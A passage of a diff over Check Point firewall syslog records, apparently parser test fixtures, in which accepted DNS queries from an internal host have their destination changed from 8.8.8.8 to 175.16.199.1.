layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49980"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34984"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d262,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500770"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58365"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41490"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d257,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500759"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48567"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49354"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500768"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56759"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500768"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49980"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34984"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d262,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500770"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58365"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d265,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500773"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34901"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d266,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500774"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52650"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500779"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500779"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:53:01Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d26d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:53:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d274,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500788"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44282"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d274,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500788"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
